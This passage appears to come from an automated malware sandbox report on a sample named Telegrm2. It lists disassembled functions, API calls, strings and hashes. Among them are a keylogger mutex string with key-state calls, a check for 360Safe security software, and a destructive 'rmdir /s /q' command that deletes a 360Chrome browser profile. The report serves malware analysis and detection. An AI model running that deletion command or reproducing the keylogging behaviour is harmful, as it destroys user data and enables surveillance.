                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual$Create$CurrentProcess$ButtonCheckedCloseFileFindHandleLibraryLoadLogonSleepSnapshotThreadToolhelp32WindowWith
                                            • String ID: Q360SafeMonClass$user32.dll
                                            • API String ID: 200090976-537184153
                                            • Opcode ID: 921665ad5ac78c43fd3a9f23d873db2a3a650aae6eac6ae2d962f46c08df0d72
                                            • Instruction ID: 53ee86ea457e476088e8b24bd461e639f0074f705ed1dfaf1774efb681e9246d
                                            • Opcode Fuzzy Hash: 921665ad5ac78c43fd3a9f23d873db2a3a650aae6eac6ae2d962f46c08df0d72
                                            • Instruction Fuzzy Hash: 30F03024733B0243FB56E7FAFCB47A512E9AF98751F4865248A0A89690EE28C5458614
                                            Function 030AE1F0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 34sleepsynchronizationCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateMutexA.KERNEL32 ref: 030AE20B
                                            • GetLastError.KERNEL32 ref: 030AE214
                                            • GetModuleHandleA.KERNEL32 ref: 030AE223
                                              • Part of subcall function 030ADA90: SHGetFolderPathA.SHELL32 ref: 030ADACD
                                              • Part of subcall function 030ADA90: lstrcat.KERNEL32 ref: 030ADADD
                                              • Part of subcall function 030ADA90: CreateMutexA.KERNEL32 ref: 030ADAEE
                                              • Part of subcall function 030ADA90: WaitForSingleObject.KERNEL32 ref: 030ADB06
                                              • Part of subcall function 030ADA90: CreateFileA.KERNEL32 ref: 030ADB34
                                              • Part of subcall function 030ADA90: GetFileSize.KERNEL32 ref: 030ADB42
                                              • Part of subcall function 030ADA90: CloseHandle.KERNEL32 ref: 030ADB4D
                                              • Part of subcall function 030ADA90: DeleteFileA.KERNEL32 ref: 030ADB5E
                                              • Part of subcall function 030ADA90: ReleaseMutex.KERNEL32 ref: 030ADB70
                                              • Part of subcall function 030ADEB0: GetKeyState.USER32 ref: 030ADFA5
                                              • Part of subcall function 030ADEB0: lstrlen.KERNEL32 ref: 030ADFFE
                                              • Part of subcall function 030ADEB0: wsprintfA.USER32 ref: 030AE06C
                                              • Part of subcall function 030ADEB0: lstrlen.KERNEL32 ref: 030AE105
                                            • Sleep.KERNEL32 ref: 030AE250
                                            • CloseHandle.KERNEL32 ref: 030AE261
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: CreateFileHandleMutex$Closelstrlen$DeleteErrorFolderLastModuleObjectPathReleaseSingleSizeSleepStateWaitlstrcatwsprintf
                                            • String ID: K^e^y^L^o^g^g^e^r
                                            • API String ID: 809812578-2826508260
                                            • Opcode ID: 89460a35c748eb327358448a72d58bcfd2f9277bad92bf41dea310a58b81c931
                                            • Instruction ID: 95601a861cd8af83053e6ee27c3ade08cad660cd83db1e169b614e63c23c7eeb
                                            • Opcode Fuzzy Hash: 89460a35c748eb327358448a72d58bcfd2f9277bad92bf41dea310a58b81c931
                                            • Instruction Fuzzy Hash: 8D01F431215B41C2EB95DBA9F46436D73A5F7C5780F54E125D64B46A60CF3CC189C704
                                            Function 030AEC62 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 25processCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030AF1D0: CreateToolhelp32Snapshot.KERNEL32 ref: 030AF1F7
                                            • WinExec.KERNEL32 ref: 030AECC3
                                              • Part of subcall function 030AF130: SHGetKnownFolderPath.SHELL32 ref: 030AF166
                                              • Part of subcall function 030AF130: wsprintfW.USER32 ref: 030AF184
                                            Strings
                                            • 360se.exe, xrefs: 030AEC8F
                                            • cmd.exe /c rmdir /s /q "%userprofile%\AppData\Local\360Chrome\Chrome\User Data\Default", xrefs: 030AECBA
                                            • \AppData\Roaming\360se6\User Data\Default, xrefs: 030AEC79, 030AEC9F
                                            • 360se6.exe, xrefs: 030AEC69
                                            • 360chrome.exe, xrefs: 030AECAE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: CreateExecFolderKnownPathSnapshotToolhelp32wsprintf
                                            • String ID: 360chrome.exe$360se.exe$360se6.exe$\AppData\Roaming\360se6\User Data\Default$cmd.exe /c rmdir /s /q "%userprofile%\AppData\Local\360Chrome\Chrome\User Data\Default"
                                            • API String ID: 3785949191-1706831714
                                            • Opcode ID: d1eaf7f8e489474969b91f961f9eca55b1cc3b354283557bd717e9cd878dd9fd
                                            • Instruction ID: afa4f312569ee8f646f577e601c283e6d72f93f67b1ec56fdea3fbfd5832f340
                                            • Opcode Fuzzy Hash: d1eaf7f8e489474969b91f961f9eca55b1cc3b354283557bd717e9cd878dd9fd
                                            • Instruction Fuzzy Hash: 6AF09428223F0251FA55EB69FDA03951369B788784FC87521894D8A164DF6CC34BC710
                                            Function 02DD0AA8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _getptd
                                            • String ID: MOC$RCC$csm
                                            • API String ID: 3186804695-2671469338
                                            • Opcode ID: 10d97835973d9dff22855d7531b95dc321e5d89865d4bff4cac848954f1654b4
                                            • Instruction ID: eb97d5452c12ce1449d091c67a097252b8b724e7cb4dc6e2250afddf962fa613
                                            • Opcode Fuzzy Hash: 10d97835973d9dff22855d7531b95dc321e5d89865d4bff4cac848954f1654b4
                                            • Instruction Fuzzy Hash: 32E0E5344546098EC7157B6490193A436B1FF9930AF5A69E994848B321E7BC4CC4DFA3
                                            Function 030C10F0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 20COMMON
                                            Download Yara Rule
                                            APIs
                                            • _getptd.LIBCMT ref: 030C110F
                                              • Part of subcall function 030B4958: _amsg_exit.LIBCMT ref: 030B496E
                                              • Part of subcall function 030B9D24: _getptd.LIBCMT ref: 030B9D28
                                            • _getptd.LIBCMT ref: 030C1121
                                            • _getptd.LIBCMT ref: 030C112F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _getptd$_amsg_exit
                                            • String ID: MOC$RCC$csm
                                            • API String ID: 2610988583-2671469338
                                            • Opcode ID: f307a058d7fc1358eac74b465088393c8bf8ac7de28af7775c75655e6eba5b05
                                            • Instruction ID: 73cc4454f328f25f7abafbc198f894dd2b810eaf7780dd62e5904c88e61d2d5b
                                            • Opcode Fuzzy Hash: f307a058d7fc1358eac74b465088393c8bf8ac7de28af7775c75655e6eba5b05
                                            • Instruction Fuzzy Hash: 94E0123A616385C6CB5AEB69C0443EC35F0F7D9715F9AD0658A5446312C7BC45908B52
                                            Function 02DCD470 Relevance: 9.3, APIs: 6, Instructions: 293COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: __doserrno_errno$_invalid_parameter_noinfofree
                                            • String ID:
                                            • API String ID: 3760323483-0
                                            • Opcode ID: f6f2cbfcb04b39f03fd32e05ec31852a2d6f70f061b4e20e682d57eae25433b6
                                            • Instruction ID: f132bfb965de6f1e0ed3b9fe3cf36d7f18eb47f9019d891d0c7887c95469ab66
                                            • Opcode Fuzzy Hash: f6f2cbfcb04b39f03fd32e05ec31852a2d6f70f061b4e20e682d57eae25433b6
                                            • Instruction Fuzzy Hash: 3181F430618A4E8FDB19EF68C8896B877E2FB56315F60413DD48AC7351DB74E806CB52
                                            Function 02DC58A8 Relevance: 9.2, APIs: 6, Instructions: 164COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: free$_errno_getptd$_lockmalloc
                                            • String ID:
                                            • API String ID: 1369581901-0
                                            • Opcode ID: dfd48de12b3e966387c16bd8cfcff08fc85f586fa0c636f5f2138c5d3ae57c13
                                            • Instruction ID: 146456f3c955f9443bfc323390c911cda3b52f31c3b461dded9df9f48ece004f
                                            • Opcode Fuzzy Hash: dfd48de12b3e966387c16bd8cfcff08fc85f586fa0c636f5f2138c5d3ae57c13
                                            • Instruction Fuzzy Hash: 7551E130618A468FDB54EF68A48176977E2FB89314FA4419DC88ED7352DB34BC42CB92
                                            Function 030B5EF0 Relevance: 9.1, APIs: 6, Instructions: 118COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _getptd.LIBCMT ref: 030B5F0F
                                              • Part of subcall function 030B4958: _amsg_exit.LIBCMT ref: 030B496E
                                              • Part of subcall function 030B5B2C: _getptd.LIBCMT ref: 030B5B36
                                              • Part of subcall function 030B5B2C: _amsg_exit.LIBCMT ref: 030B5BD3
                                              • Part of subcall function 030B5BE8: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,030B5F2A,?,?,?,?,?,030B60E7), ref: 030B5C12
                                              • Part of subcall function 030B52FC: malloc.LIBCMT ref: 030B5327
                                              • Part of subcall function 030B52FC: Sleep.KERNEL32(?,?,?,030B9B11,?,?,?,030B9BBB,?,?,0000000D,030B4A1B,?,?,?,030B30B6), ref: 030B533A
                                            • free.LIBCMT ref: 030B5F9A
                                              • Part of subcall function 030B3D28: HeapFree.KERNEL32(?,?,00000000,030B4940,?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000), ref: 030B3D3E
                                              • Part of subcall function 030B3D28: _errno.LIBCMT ref: 030B3D48
                                              • Part of subcall function 030B3D28: GetLastError.KERNEL32(?,?,00000000,030B4940,?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000), ref: 030B3D50
                                            • _lock.LIBCMT ref: 030B5FCA
                                            • free.LIBCMT ref: 030B606D
                                            • free.LIBCMT ref: 030B6099
                                            • _errno.LIBCMT ref: 030B609E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: free$_amsg_exit_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
                                            • String ID:
                                            • API String ID: 3894533514-0
                                            • Opcode ID: dd439981d31cbd1ad096d8d1268cc7ac16342b8082a7519b4d22bcb16c72a6ee
                                            • Instruction ID: 266496e174ec5d9f99e8bf885b40272edd8fcb2f3e4076d466cf9c3203e4497b
                                            • Opcode Fuzzy Hash: dd439981d31cbd1ad096d8d1268cc7ac16342b8082a7519b4d22bcb16c72a6ee
                                            • Instruction Fuzzy Hash: 4941F13A60278486D755DF66E8903EFBBF9F785B84F188156CA9A4B364CF3AC442C701
                                            Function 02DC856C Relevance: 9.1, APIs: 6, Instructions: 116COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfo_lockcalloc
                                            • String ID:
                                            • API String ID: 2577527384-0
                                            • Opcode ID: 2f70ec6ef3d5c3994c8657d7c15eef66e98feaa01b428a6d9299e4e104dbd0a3
                                            • Instruction ID: 475bfff7f189f42a7d40bdb7521a59f09c6ea21c2f59c7b73e0478a11f9834b4
                                            • Opcode Fuzzy Hash: 2f70ec6ef3d5c3994c8657d7c15eef66e98feaa01b428a6d9299e4e104dbd0a3
                                            • Instruction Fuzzy Hash: 79318C30628F4B8F9B55AF6D9815B2AB3D2FB59304FA1056D988DC7350EF34DC409B92
                                            Function 02DC9468 Relevance: 9.1, APIs: 6, Instructions: 82COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _FF_MSGBANNER.LIBCMT ref: 02DC948F
                                              • Part of subcall function 02DC9E5C: _set_error_mode.LIBCMT ref: 02DC9E65
                                              • Part of subcall function 02DC9E5C: _set_error_mode.LIBCMT ref: 02DC9E74
                                              • Part of subcall function 02DC9BFC: _set_error_mode.LIBCMT ref: 02DC9C41
                                              • Part of subcall function 02DC9BFC: _set_error_mode.LIBCMT ref: 02DC9C52
                                              • Part of subcall function 02DC4CB4: malloc.LIBCMT ref: 02DC4CDF
                                            • _errno.LIBCMT ref: 02DC94D1
                                            • _lock.LIBCMT ref: 02DC94E5
                                            • free.LIBCMT ref: 02DC9508
                                            • _errno.LIBCMT ref: 02DC950D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _set_error_mode$_errno$_lockfreemalloc
                                            • String ID:
                                            • API String ID: 360200360-0
                                            • Opcode ID: 73ae3fb5c7c4ccbaaf4f8d4c4d45a553f7f84ec8388a2a8c33d3473ba375301a
                                            • Instruction ID: a4e8e41e507410e7922a35c443f2ac0c4efb723312bf35da4941893acf16035f
                                            • Opcode Fuzzy Hash: 73ae3fb5c7c4ccbaaf4f8d4c4d45a553f7f84ec8388a2a8c33d3473ba375301a
                                            • Instruction Fuzzy Hash: 7C219D70228A0B9FE754BFA4E4647B973A2FB84310FA0486DD04AC3390DB78CC80CB61
                                            Function 030B8BB4 Relevance: 9.1, APIs: 6, Instructions: 79COMMON
                                            Download Yara Rule
                                            APIs
                                            • _lock.LIBCMT ref: 030B8BDB
                                              • Part of subcall function 030B9B98: _amsg_exit.LIBCMT ref: 030B9BC2
                                            • _errno.LIBCMT ref: 030B8BEF
                                            • _invalid_parameter_noinfo.LIBCMT ref: 030B8BFB
                                              • Part of subcall function 030B5664: GetCurrentProcess.KERNEL32(?,?,?,?,030B5706), ref: 030B567C
                                            • calloc.LIBCMT ref: 030B8C3D
                                            • _errno.LIBCMT ref: 030B8C4A
                                            • _errno.LIBCMT ref: 030B8C55
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno$CurrentProcess_amsg_exit_invalid_parameter_noinfo_lockcalloc
                                            • String ID:
                                            • API String ID: 1209116363-0
                                            • Opcode ID: 4f3738307055406423e360ddfa7f424b5fbc0e22cbc932e279b4e9268e3fe333
                                            • Instruction ID: abd09c9b161c060d8cb769ac00a23e76dd1fc904fc3d1ff499988476cc853d1e
                                            • Opcode Fuzzy Hash: 4f3738307055406423e360ddfa7f424b5fbc0e22cbc932e279b4e9268e3fe333
                                            • Instruction Fuzzy Hash: 4721B079303B4282DB15EF65A5502DEA2F9FB85BC0B488468DF894BB24DF38C811C704
                                            Function 030B976C Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,030B42ED), ref: 030B9785
                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,030B42ED), ref: 030B97DC
                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,030B42ED), ref: 030B9817
                                            • free.LIBCMT ref: 030B9824
                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,030B42ED), ref: 030B982F
                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,030B42ED), ref: 030B983D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide$free
                                            • String ID:
                                            • API String ID: 517548149-0
                                            • Opcode ID: e92270d1c1e25466c38415bf8e68df5b368d6513ed967c410428f0e42ef408fa
                                            • Instruction ID: 22add244ccaa134a4d8e3483c190b44da7941605d746ec883c373c0a7361093c
                                            • Opcode Fuzzy Hash: e92270d1c1e25466c38415bf8e68df5b368d6513ed967c410428f0e42ef408fa
                                            • Instruction Fuzzy Hash: 47212C3261AB8087DB65DF22B41435AB7F9FB89BC4F489114DE8A17B14EF38D151C708
                                            Function 02DC8448 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno$__doserrno_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 4115123133-0
                                            • Opcode ID: 6bd33e9cc88758b05f4ffe04088cbd09dc5e0fe9f91c9aa33adb7de791cfd3bc
                                            • Instruction ID: 7cd2e513ded4937cf5f5f6960d8d2725015534383aaf906d7990c00e5a705cc0
                                            • Opcode Fuzzy Hash: 6bd33e9cc88758b05f4ffe04088cbd09dc5e0fe9f91c9aa33adb7de791cfd3bc
                                            • Instruction Fuzzy Hash: 2FF03C306086034AEB262FB48859B793257DF4232AF71015CDDA6CB3A4DB748C41EBB1
                                            Function 030B48D4 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.KERNEL32(?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000,030B532C), ref: 030B48DE
                                            • FlsGetValue.KERNEL32(?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000,030B532C), ref: 030B48EC
                                            • SetLastError.KERNEL32(?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000,030B532C), ref: 030B4944
                                              • Part of subcall function 030B537C: Sleep.KERNEL32(?,?,?,030B4907,?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000), ref: 030B53C1
                                            • FlsSetValue.KERNEL32(?,?,2800000000000000,030B3209,?,?,?,?,030B57C6,?,?,2800000000000000,030B532C), ref: 030B4918
                                            • free.LIBCMT ref: 030B493B
                                              • Part of subcall function 030B481C: _lock.LIBCMT ref: 030B4870
                                              • Part of subcall function 030B481C: _lock.LIBCMT ref: 030B488F
                                            • GetCurrentThreadId.KERNEL32 ref: 030B492C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                            • String ID:
                                            • API String ID: 3106088686-0
                                            • Opcode ID: 6ebd17abd531518c99cd0e2d202aae095663125e7d7d49137b697db85a716716
                                            • Instruction ID: 3109191c6d05ae239257fa3a555cf57b646a93af03b174366920f1385048af2f
                                            • Opcode Fuzzy Hash: 6ebd17abd531518c99cd0e2d202aae095663125e7d7d49137b697db85a716716
                                            • Instruction Fuzzy Hash: 0401622520774186EB16DF6BE46436862A5BB88BE0F589724CE2A07391EE3CC646C219
                                            Function 02DD1350 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 224COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _getptd$CallTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3569367362-2084237596
                                            • Opcode ID: a6f955ceb13d2aead7e47fc715c960d9cbe24e492db051bcc867407ba1bb340d
                                            • Instruction ID: affa01d385e462e7874e61c73dfa274d15854fa71f58c479b1b704d607924296
                                            • Opcode Fuzzy Hash: a6f955ceb13d2aead7e47fc715c960d9cbe24e492db051bcc867407ba1bb340d
                                            • Instruction Fuzzy Hash: 8261C430118F0A8FD724EF58C0457E9B3E1FB80319F504AAED48AC7615EBB4E955CB92
                                            Function 030C1998 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 143COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _getptd.LIBCMT ref: 030C19C9
                                              • Part of subcall function 030B4958: _amsg_exit.LIBCMT ref: 030B496E
                                            • _getptd.LIBCMT ref: 030C19E7
                                            • _CallSETranslator.LIBCMT ref: 030C1A2F
                                              • Part of subcall function 030C0988: _getptd.LIBCMT ref: 030C09AF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _getptd$CallTranslator_amsg_exit
                                            • String ID: MOC$RCC
                                            • API String ID: 1374396951-2084237596
                                            • Opcode ID: 6e16c81e6c822a8750d36d40124a26e8b86a2e26d73b274476b056664398a812
                                            • Instruction ID: d8fc947f60d79f85906ca7c38d745f3a8111ed582c03ec63bbcd8dbb364e2e2d
                                            • Opcode Fuzzy Hash: 6e16c81e6c822a8750d36d40124a26e8b86a2e26d73b274476b056664398a812
                                            • Instruction Fuzzy Hash: 9951D376616BC5D6CF68DB15E0803AEB3A0FBC1B88F48462ACB9E47718DB78C151CB00
                                            Function 030C1511 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _getptd$ExceptionRaise_amsg_exit
                                            • String ID: csm
                                            • API String ID: 4155239085-1018135373
                                            • Opcode ID: 2a92d8b94d199411569623bf7d213a1b1f6b3e674cdaeca3214569076b6d729b
                                            • Instruction ID: 277ffdc27df7e03ca5f52ef935381262c5b7ce2455c9db1d228329c57126c198
                                            • Opcode Fuzzy Hash: 2a92d8b94d199411569623bf7d213a1b1f6b3e674cdaeca3214569076b6d729b
                                            • Instruction Fuzzy Hash: A7218E3A215780C6CA34DF12E04079EB3B5F389BA5F044229CFAA07B92CB39D546CB00
                                            Function 030B23A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: ComputerNamelstrcpywsprintf
                                            • String ID: SOFTWARE\%sW\$UnKnow
                                            • API String ID: 2045598086-1925786254
                                            • Opcode ID: b7d895ed52d353bffa7a47f3b5d2dd0a632e2455800136d02e82ff9c6e992366
                                            • Instruction ID: 923328319fdc7caaed3b162595fe4603ee2547132da5f27640495443ea31f9ce
                                            • Opcode Fuzzy Hash: b7d895ed52d353bffa7a47f3b5d2dd0a632e2455800136d02e82ff9c6e992366
                                            • Instruction Fuzzy Hash: B221A122229AC181EB50DF65E8547DAB7B5F7D4744F801122968D87E68EB7DC209CB04
                                            Function 030B22C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: ComputerNamelstrcpywsprintf
                                            • String ID: SOFTWARE\%sW\$UnKnow
                                            • API String ID: 2045598086-1925786254
                                            • Opcode ID: 9a0f78225019bec5deb3bcd3db4271389db7be9a6f745cdf9b7e71a9e80b477f
                                            • Instruction ID: 1bd25c1835ffc14b1cdf1dba2bf9fc899cdb33972ff3bc388b01cde562bc6e2a
                                            • Opcode Fuzzy Hash: 9a0f78225019bec5deb3bcd3db4271389db7be9a6f745cdf9b7e71a9e80b477f
                                            • Instruction Fuzzy Hash: CD113032219A8192EB21DF15F4547DE6375F7D8744F845111D78D47968EF3DC649CB00
                                            Function 030B21D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: ComputerNamelstrcpywsprintf
                                            • String ID: SOFTWARE\%sW\$UnKnow
                                            • API String ID: 2045598086-1925786254
